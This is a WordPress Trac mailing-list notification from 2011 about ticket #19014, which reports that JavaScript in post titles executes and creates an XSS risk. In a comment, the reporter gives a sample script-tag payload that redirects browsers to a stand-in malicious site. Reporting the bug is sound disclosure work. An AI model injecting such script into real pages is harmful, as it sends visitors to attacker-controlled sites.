[wp-trac] [WordPress Trac] #19014: Titles containing JavaScript execute the JavaScript - XSS risk
WordPress Trac
wp-trac at lists.automattic.com
Thu Oct 20 14:27:17 UTC 2011
#19014: Titles containing JavaScript execute the JavaScript - XSS risk
--------------------------+------------------------------
Reporter: dbvista | Owner:
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: General | Version: 3.2.1
Severity: major | Resolution:
Keywords: |
--------------------------+------------------------------
Comment (by dbvista):
Here's another great title:
<script language="javascript">document.location='http://www.you-are-
hacked.com';</script>
which directs the browser to a malicious site.
--
Ticket URL: <http://core.trac.wordpress.org/ticket/19014#comment:1>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list